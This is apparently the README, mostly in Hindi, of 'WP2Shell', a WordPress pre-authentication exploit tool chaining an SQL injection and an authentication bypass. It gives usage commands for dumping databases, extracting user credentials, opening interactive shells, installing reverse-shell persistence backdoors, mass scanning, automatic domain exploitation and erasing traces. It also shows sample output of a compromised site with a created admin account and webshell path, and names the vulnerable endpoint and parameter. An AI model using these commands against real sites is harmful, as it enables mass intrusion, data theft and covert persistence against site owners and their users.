मॉड्यूलर WordPress प्री-ऑथ एक्सप्लॉइट फ्रेमवर्क जो SQL इंजेक्शन और ऑथेंटिकेशन बायपास को चेन करके रिमोट कोड एक्ज़ीक्यूशन, इंटरैक्टिव शेल, बैकडोर और मास भेद्यता स्कैनिंग प्रदान करता है।
CVE-2026-63030 + CVE-2026-60137
संस्करण: 4.0.0
लेखक: G0D150NE
WP2Shell, WordPress प्री-ऑथेंटिकेशन रिमोट कोड एक्सीक्यूशन के लिए एक फुल-चेन एक्सप्लॉइट टूल है। यह दो गंभीर कमजोरियों को जोड़ता है:
यह टूल कमजोर WordPress इंस्टॉलेशन पर बिना किसी प्रमाणीकरण के पूर्ण नियंत्रण प्राप्त करने की अनुमति देता है - डिटेक्शन से लेकर पूर्ण RCE और पर्सिस्टेंस तक।
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell
# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]
| कमांड | विवरण |
|---|---|
check | गैर-विनाशकारी कमजोरी पुष्टि |
read | SQL इंजेक्शन के माध्यम से डेटा निकालें |
exploit | पूर्ण प्री-ऑथ RCE श्रृंखला |
shell | मौजूदा क्रेडेंशियल्स के साथ वेबशेल तैनात करें |
masscan | कई लक्ष्यों की मास स्कैन |
autopwn | स्वचालित खोज → स्कैन → शोषण |
python3 wp2shell.py check https://target.com
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5
बेसिक फिंगरप्रिंट:
python3 wp2shell.py read https://target.com
उपयोगकर्ता निकालें:
python3 wp2shell.py read https://target.com --preset users
कस्टम क्वेरी:
python3 wp2shell.py read https://target.com --query "SELECT @@version"
पूरा डेटाबेस डंप करें:
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096
बेसिक एक्सप्लॉइट:
python3 wp2shell.py exploit https://target.com
इंटरैक्टिव शेल के साथ एक्सप्लॉइट:
python3 wp2shell.py exploit https://target.com --interactive
बैकडोर इंस्टॉलेशन के साथ एक्सप्लॉइट:
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444
डेटाबेस डंप के साथ एक्सप्लॉइट:
python3 wp2shell.py exploit https://target.com --dumpdb
क्लीनअप के साथ एक्सप्लॉइट (निशान हटाएँ):
python3 wp2shell.py exploit https://target.com --cleanup
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100
यह निम्न कार्य करेगा:
शोषण के बाद, आपको एक पूर्ण इंटरैक्टिव शेल मिलता है:
python3 wp2shell.py exploit https://target.com -i
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit
| विकल्प | विवरण |
|---|---|
--timeout | HTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 30) |
--proxies | कॉमा-सेपरेटेड प्रॉक्सी सूची (जैसे, http://127.0.0.1:8080) |
--stealth | यादृच्छिक विलंब के साथ स्टील्थ मोड सक्षम करें |
-v, --verbose | डीबग आउटपुट सक्षम करें |
-q, --quiet | बैनर और सूचना संदेश दबाएँ |
| विकल्प | विवरण |
|---|---|
--prefix | टेबल प्रीफिक्स (डिफ़ॉल्ट: wp_) |
--auto-prefix | टेबल प्रीफिक्स स्वतः खोजें |
--max-length | प्रति मान अधिकतम वर्ण (डिफ़ॉल्ट: 128) |
--technique | निष्कर्षण तकनीक: auto/union/error/blind |
--preset | डेटा प्रीसेट: fingerprint/users/dumpall |
--query | निकालने के लिए मनमाना SQL एक्सप्रेशन |
| विकल्प | विवरण |
|---|---|
--prefix | टेबल प्रीफिक्स (डिफ़ॉल्ट: wp_) |
--no-discover | ऑटो-डिस्कवरी छोड़ें, डिफ़ॉल्ट का उपयोग करें |
-i, --interactive | शोषण के बाद शेल में जाएँ |
-c, --command | शोषण के बाद एकल कमांड निष्पादित करें |
--backdoor | पर्सिस्टेंस बैकडोर इंस्टॉल करें |
--lhost | रिवर्स शेल के लिए LHOST (डिफ़ॉल्ट: 10.0.0.1) |
--lport | रिवर्स शेल के लिए LPORT (डिफ़ॉल्ट: 4444) |
--dumpdb | शोषण के बाद डेटाबेस डंप करें |
--cleanup | बाहर निकलने पर बनाए गए उपयोगकर्ता और वेबशेल को हटाएँ |
SQL इंजेक्शन (CVE-2026-63030)
/wp-json/batch/v1 एंडपॉइंट में होता हैauthor_exclude पैरामीटर टाइम-आधारित ब्लाइंड SQLi के लिए कमजोर हैऑथेंटिकेशन बाईपास (CVE-2026-60137)
/_embed पैरामीटर के माध्यम से oEmbed कैश पॉइज़निंग| संस्करण | स्थिति |
|---|---|
| 6.9.0 | ✅ कमजोर |
| 6.9.1 | ✅ कमजोर |
| 6.9.2 | ✅ कमजोर |
| 6.9.3 | ✅ कमजोर |
| 6.9.4 | ✅ कमजोर |
| 7.0.0 | ✅ कमजोर |
| 7.0.1 | ✅ कमजोर |
| ≥ 7.0.2 | ❌ पैच किया गया |
| तकनीक | गति | डेटा आकार | आवश्यकताएँ |
|---|---|---|---|
| UNION | ⚡ बहुत तेज़ | असीमित | लक्ष्य UNION को फ़िल्टर नहीं करना चाहिए |
| एरर | 🚀 तेज़ | ~30 वर्ण/अनुरोध | लक्ष्य को एरर संदेश प्रदर्शित करने चाहिए |
| ब्लाइंड | 🐢 धीमी | असीमित | बूलियन ओरेकल उपलब्ध होना चाहिए |
░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░ ░▒▓█▓▒░
CVE-2026-63030 + CVE-2026-60137
WordPress Pre-Auth RCE [v4.0.0]
+ G0D150NE
[1/7] Reconnaissance
Target: https://target.com
WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)
[2/7] Enumerating target
[+] Discovered table prefix: wp_
[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/
[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered
[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]
[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain
[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
uid: www-data
[+] ========================================================
[+] TARGET COMPROMISED
[+] Admin: wp_service_a1b2 / G7hK9xQw2p$L!mN
[+] Shell: https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग अवैध है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदारी नहीं लेते हैं।
कोई बग मिला? टूल को बेहतर बनाना चाहते हैं? पुल रिक्वेस्ट का स्वागत है!
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।